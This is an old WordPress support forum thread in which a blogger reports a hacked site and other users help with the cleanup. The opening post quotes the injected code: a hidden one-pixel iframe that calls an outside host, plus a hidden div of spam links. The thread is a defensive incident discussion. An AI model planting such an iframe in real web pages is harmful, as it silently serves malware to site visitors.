URGENT: I think I have been hacked

Just a further update. I have just viewed the source of my main page and there is loads of stuff and links on there I have not added.

The lines are at the top of the page above the html and start off with this…

iframe src=”https://www.orlangur.org/go.php&#8221; width=1 height=1></iframe>
<div style=”overflow:auto; visibility:hidden; height: 1px; ”

I have a similar problem! I think my site (https://www.DustyAnt.com) has been hacked.

All my sub-folders have been deleted. Including wp-admin.

I’m hosted on dreamhost. I have contacted dreamhost about this. I’ll post updates.

I updated to 2.0.6 two days back. Could that cause it? I used the dreamhost one-click upgrade tool

I have emailed my host, hopefully they can help.

Thankfully, all my folders are still there. Its this massive chunk of links which bother me. There are hundreds of them but they are only in the source, they are not visible on the page.

I tried changing themes but with no effect, the stuff is still there.

I too also installed the new wordpress recently but only the index.php file

I just looked at the original index.php and the content is worrying…

< ?php
// Silence is golden.
? >

Has the wordpress download been hacked?

< ?php
// Silence is golden.
? >

Has the wordpress download been hacked?

That’s in every wordpress install. It was put in there by the authors. (Just like at the bottom of the stylesheet in the default theme, you’ll see the lyrics for “Daisy”) Means nothing.

However, the iframe thing – I had the same thing happen to me when I used Movable Type. I found that the iframe was at the bottom of every single post I had, so I had to go through my archives (3 years of them!) to remove the offending code. Turned out I had a wrong permission setting, and they wormed in that way. (Not to mention, at the time, I was using IE as my main browser, and my computer was ridden with spyware and hijacked browser windows – this was prior to educating myself on the defenses.)

WordPress is lucky in the fact that your posts are not in your directories, they reside in your database, so no code can be placed in the actual posts themselves. However, if your permission settings are wrong (or were at one time, giving someone access), then your template files probably have them in the code.

If your permission settings *are* good (i.e. all directories at 755, all files at 644) and you were still hacked, you most certainly need to contact your host, because there’s something going on with the server.

But to resolve the situation, I would recommend 1) backup your database so you don’t lose any posts; 2) uninstall and wipe out your current WordPress installation; 3) get the new install (it’s up to 2.0.7 now, as of yesterday) and redo your installation.

I would also get Spybot and Ad-Aware and run it on your computer to remove any spyware you may have – and run it with your computer in safe mode to be sure you get it all. And while you’re in safe mode, change all of your passwords, as well. Then get back in your hosting area and change *those* passwords too – FTP, login, the works.

Oh this is horrible. I now have people telling me they are getting virus warnings. I have no idea what is going on.
My folders are at 755 as far as I know.

I am in the process of upgrading my wordpress and have got onto my hosting company. I dearly hope nobodys machines have been compromised.

Hello,

I made a plugin which restricts IP addresses to login to the admin panel, meaning you can ban different ip addresses from the admin panel.

It is available from here

This might help a bit if the hackers use the admin panel.

Thanks Goxu. I shall do that after I managed to upgrade this thing.
That would work fine for me as I have a static ip address anyway.

I now have people telling me they are getting virus warnings. I have no idea what is going on.

It’s the iframes. You can’t see them because they are 1px by 1px in size. An Iframe calls in an external webpage. The script that has placed the iframe on your pages is linking to a site that feeds out virus installations.

Unfortunately, anyone using IE to view your blog most likely *has* been compromised, because most people shut off the warnings that IE feeds you. The only way they would know is if they happen to glance into the bottom left of the browser window, and saw the text in the status bar that said “downloading from xxx site”. It’s meant to do that – download this crap without anyone ever knowing it’s happened.

So yes, you’ll need to take your site down ASAP so you can remove the malicious code. Put up a holder page that says “get your computer checked immeditately” and proved links to Ad-Aware, Hijack This!, SpyBot, and CW Shredder. Tell people to run virus scans (and be sure they have the latest updates) and do all of this in Safe Mode.

The crap happens, and it sucks. But if you catch it and do something about it ASAP, then the damage control is a lot less than if you let it just stay there and do it’s thing. But the longer you leave it up there, the more people will become compromised.

Just had a friend tell me her blog had malicious warnings on it today. Could there be a problem with wordpress 2.0.6 itself??

You don’t read the replies, just post?
Above your last post doodlebee gave you detailed instructions what to do.
Read it.
Do it.
The problem is with YOUR SITE, not WP.

Hi Moshu,

I have been spending the last 2 hours cleaning up my blog. I have taken notice of what people have advised and am doing everything as suggested.
I have deleted all of my wordpress folders and am now uploading a new one.
Spybot found absolutely nothing on my PC not even a single tracking cookie (good old vista).

So thanks, I have been taking notice and reading all the replies. It is fair to ask the question of the 2.0.6 install as it is fairly new so please do not be brash with me just for asking a simple question. After all, no system is ever 100% secure and not even wordpress itself is immune from problems.

Yes, 2.0.6 had a security issue, and 2.0.7 is out to fix it.
https://www.ads-software.com/development/
Maybe the hackers used that vulnerability, maybe not. Have no idea.
My point was: fix the thing first – make sure it works… and then there is plenty of time discussing it.

I am trying my hardest, honest ??

I have changed the password to my accounts including hosting. Have now managed to reinstall wordpress and posts are still there thankfully.

Now when I view source, all that keyword crap has gone and I think the blog is now clean. Thanks to those who advised.

I now have to spend a lot of time downloading all my plugins again and starting afresh.

Why the heck do they do this? They cannot gain anything out of it. Its like kids who play knock down ginger – knocking on doors and running away, they dont get to see the horror on peoples faces.

I am so mad. They got in somehow, whether it was a leak in wordpress or my passwords being compromised I don’t know and I am not here to cast allegation on anything.

Now I have to apologise to my regular readers and explain somehow to them that they may have been affected by these virus’s and trojans.

Still, its fixed up now and bandaged over the wounds and I just have to sort out the rest.

Why the heck do they do this? They cannot gain anything out of it.

Actually, that’s not entirely true. In fact, it’s quite possible that *you* got this by going to someone else’s website. They do this because they can load up trojans on someone else’s computer – trojans that can open up a back door into someone’s computer where they can gain access to things (at worst) like your bank account logins, passwords, credit cards, all those goodies. There are different ways of gaining access to do this to someone’s site, but the reasons are all the same – money, and trying to get it “easily” by exploiting and stealing.

If it makes you feel any better, most people who are faithful to someone’s blog will understand, and they’ll be thankful you told them (instead of not saying anything) so they can get themselves fixed, if need be. I know when it happened to me, my reader base was 100% grateful I let them know, and told them how to fix it.